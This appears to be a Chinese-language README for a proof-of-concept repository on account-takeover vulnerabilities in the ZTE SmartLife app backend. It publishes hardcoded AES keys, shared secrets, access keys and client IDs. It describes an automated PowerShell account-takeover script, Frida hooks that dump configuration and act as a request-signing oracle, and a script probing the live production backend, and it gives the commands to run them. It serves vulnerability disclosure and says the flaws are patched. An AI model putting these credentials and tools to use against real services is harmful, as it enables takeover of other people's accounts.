ZTE SmartLife 安全发现导致账户接管:Google Play 下载量超过 10 万次,以及 CVE-2026-86552 至 CVE-2026-86555。
本目录包含用于验证 ZTE SmartLife 后端漏洞(CVE-2026-86552、CVE-2026-86553、CVE-2026-86554、CVE-2026-86555)的最小化、独立 PoC 工具。
所有端点均已由 ZTE 修补,密钥材料也已轮换。以下脚本和密钥的发布仅用于安全研究与技术验证。
| 参数 | 值 | 作用 |
|---|---|---|
| 引导解密密钥(CVE-2026-86555) | 096760a7a99d99d12de9fecbfca568c0 | 硬编码于 AppMainBackend.setUacSignInfo 中的 AES-128-GCM 密钥 |
客户端对称密钥(appClientKey) | djrom(&)(&)MORJD | 用于 X-Auth-Value 签名和载荷参数加密的 AES-128-GCM 密钥 |
共享密钥(appUacSec) | b2cfe28732612cfd81de7a22ace2034317a47eb94683a016a85cc0883597c625 | 嵌入到带时间戳的 X-Auth-Value 令牌中的密钥 |
访问密钥(appUacItp) | 271950143414fnu4mb3lxxotfj5mi1tp | 通过 X-Itp-Value: accessKey=... 传递的访问密钥 |
应用 / 客户端 ID(appId) | 271950143414 | 客户端系统标识符 |
租户 ID(tenantId) | 10001 | 云租户标识符 |
direct-replay/包含 account-takeover-poc.ps1,这是一个自动化 PowerShell 7 脚本,演示以下内容:
CVE-2026-86555)accountId 泄露(CVE-2026-86554)CVE-2026-86553)CVE-2026-86552)frida/包含针对官方 Android 客户端(com.zte.smarthome.abroad)的进程内运行时插桩脚本:
smartlife_dump_uac.js:挂钩客户端引导解密,并转储 UAC 配置和出站请求头。smartlife_signing_oracle.js:暴露 Frida RPC 方法,以通过应用进程远程签名请求头并加密载荷。runtime-path-probes/包含 Invoke-Runtime-AppAuth-AccountProbes.ps1,这是一个独立探测脚本,使用恢复的凭据验证活跃的生产后端(https://zxuacde.smart-zte.com)。
cd direct-replay
pwsh -ExecutionPolicy Bypass -File .\account-takeover-poc.ps1
cd runtime-path-probes
pwsh -ExecutionPolicy Bypass -File .\Invoke-Runtime-AppAuth-AccountProbes.ps1
cd frida
frida -U -f com.zte.smarthome.abroad -l smartlife_dump_uac.js